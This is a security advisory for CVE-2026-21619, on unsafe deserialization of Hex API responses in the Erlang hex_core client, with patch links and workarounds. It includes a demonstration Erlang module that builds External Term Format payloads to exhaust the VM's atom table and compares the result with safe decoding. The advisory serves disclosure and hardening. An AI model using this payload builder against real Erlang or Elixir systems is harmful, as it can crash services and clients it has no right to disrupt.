Hex Client Can Crash Due to Untrusted Data
CVE-2026-21619
GHSA-hx9w-f2w9-9g96
Summary
The Hex client can crash if it receives specially crafted data from the Hex API. The attacker must control the HTTP response body the client receives from the configured Hex API endpoint (for example, a `HEX_API_URL` that points at a malicious or compromised server). To prevent this, update the Hex client to a patched version, and make sure the Hex API URL points only to trusted endpoints.
What to do
- Update hex_core to version 0.12.1 or later. Hex (Mix) and rebar3 vendor hex_core, so also update those tools to releases that include their vendored patches (linked below).
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | hex_core | < 0.12.1 | 0.12.1 |
Original title
hex_core has Unsafe Deserialization of Erlang Terms
Original description
### Impact
The Hex client (`hex_core`) deserializes Erlang terms received from the Hex API using `binary_to_term/1` without sufficient restrictions.
If an attacker can control the HTTP response body returned by the Hex API, this allows denial-of-service attacks such as **atom table exhaustion**: atoms are never garbage collected, so every new atom name in a response permanently consumes an entry in a table whose size is fixed at VM startup, and once it fills the VM aborts. No released versions are known to allow remote code execution.
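The decoding difference behind this advisory, as an added example that is not hex_core's, Hex's or rebar3's code. The module, its function names and the 1000-atom payload are constructed for illustration; the External Term Format tag values are the ones documented in the ERTS "External Term Format" chapter. It assumes a VM where `erlang:system_info(atom_count)` and `atom_limit` are available (OTP 20 or later).

```erlang
%% etf_atom_dos.erl
%% Added example (not hex_core's code): shows why decoding attacker-controlled
%% External Term Format with binary_to_term/1 grows the atom table, and how
%% binary_to_term/2 with [safe] refuses the same bytes.
-module(etf_atom_dos).
-export([payload/2, decode_unsafe/1, decode_safe/1, demo/0]).

%% External Term Format tags (ERTS "External Term Format" chapter).
-define(VERSION_MAGIC, 131).
-define(LIST_EXT, 108).
-define(NIL_EXT, 106).
-define(ATOM_UTF8_EXT, 118).

%% Encode a list of N distinct atoms named <Prefix>_1 .. <Prefix>_N as raw ETF.
%% Built from bytes on purpose: encoding with term_to_binary/1 would require
%% creating the atoms locally first. A hostile server just sends these bytes
%% as the HTTP response body; the client never needs to have seen the names.
payload(Prefix, N) when is_binary(Prefix), N > 0 ->
    Atoms = [begin
                 Name = <<Prefix/binary, "_", (integer_to_binary(I))/binary>>,
                 <<?ATOM_UTF8_EXT, (byte_size(Name)):16, Name/binary>>
             end || I <- lists:seq(1, N)],
    iolist_to_binary([<<?VERSION_MAGIC, ?LIST_EXT, N:32>>, Atoms, <<?NIL_EXT>>]).

%% The pattern the advisory describes: every atom name in Body that the VM has
%% not seen before is interned in the atom table and never released.
decode_unsafe(Body) ->
    binary_to_term(Body).

%% Hardened variant: with [safe], binary_to_term/2 raises badarg for any term
%% that would create new atoms, external funs or similar non-collectable
%% resources. The caller decides what to do with a response that fails to
%% decode; here it is reported as an error instead of crashing the caller.
decode_safe(Body) ->
    try binary_to_term(Body, [safe]) of
        Term -> {ok, Term}
    catch
        error:badarg -> {error, unsafe_term}
    end.

demo() ->
    %% Unique prefix so every demo/0 call produces atoms the VM has not seen.
    Prefix = <<"hexdemo_",
               (integer_to_binary(erlang:unique_integer([positive])))/binary>>,
    N = 1000,
    Body = payload(Prefix, N),
    Limit = erlang:system_info(atom_limit),
    Before = erlang:system_info(atom_count),
    Safe = decode_safe(Body),                 % {error, unsafe_term}
    AfterSafe = erlang:system_info(atom_count),
    Terms = decode_unsafe(Body),              % list of N brand-new atoms
    AfterUnsafe = erlang:system_info(atom_count),
    io:format("atom limit ~p, atoms before ~p~n", [Limit, Before]),
    io:format("[safe] decode: ~p, atoms now ~p~n", [Safe, AfterSafe]),
    io:format("unsafe decode of ~p atoms: atoms now ~p (+~p)~n",
              [length(Terms), AfterUnsafe, AfterUnsafe - Before]),
    {Safe, AfterUnsafe - Before}.
```

Compile and run in a throwaway VM with `erlc etf_atom_dos.erl && erl -noshell -eval 'etf_atom_dos:demo(), halt().'`; it returns `{{error,unsafe_term}, 1000}` (the second element can be slightly higher if anything else in the VM interned atoms in between). The safe decode leaves the atom count unchanged; the unsafe decode adds one atom per list element. A payload with more distinct names than `atom_limit - atom_count` (about one million by default, roughly 20 MB of ETF at these name lengths) makes the unsafe path abort the whole VM, which is the crash the advisory describes. Two caveats: `[safe]` only rejects atoms that do not already exist, so the same bytes decode fine on a second run once the names are interned, and it does not bound term size or depth, so it is a fix for this class of attack rather than a general input limit. It is the standard hardening for untrusted ETF; check the linked commits for what hex_core actually changed.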
### Patches
* https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b13
* https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
* https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
### Workarounds
Ensure that the Hex API URL (`HEX_API_URL`) points only to trusted endpoints. There is no client-side workaround that fully mitigates this issue without applying the patch.
### Resources
* hex_core Module: https://github.com/hexpm/hex_core/blob/main/src/hex_api.erl
* Hex Vendored Module: https://github.com/hexpm/hex/blob/main/src/mix_hex_api.erl
* Rebar3 Vendored Module: https://github.com/erlang/rebar3/blob/main/apps/rebar/src/vendored/r3_hex_api.erl
* hex_core Patch: https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b13
* Hex Vendored Patch: https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
* Rebar3 Vendored Patch: https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
NVD CVSS 4.0 score: 2.0
Vulnerability type
- CWE-400: Uncontrolled Resource Consumption
- CWE-502: Deserialization of Untrusted Data
References
- https://github.com/erlang/rebar3/commit/1d4478f527e373de0b225951e53115450e0d9b9d
- https://github.com/hexpm/hex/commit/636739f3322514e9303ca335fb630696fcbb3c95
- https://github.com/hexpm/hex_core/commit/cdf726095bca85ad2549d146df1e831ae93c2b1...
- https://github.com/hexpm/hex_core/security/advisories/GHSA-hx9w-f2w9-9g96
- https://nvd.nist.gov/vuln/detail/CVE-2026-21619
- https://github.com/advisories/GHSA-hx9w-f2w9-9g96
Published: 1 Mar 2026 · Updated: 13 Mar 2026 · First seen: 6 Mar 2026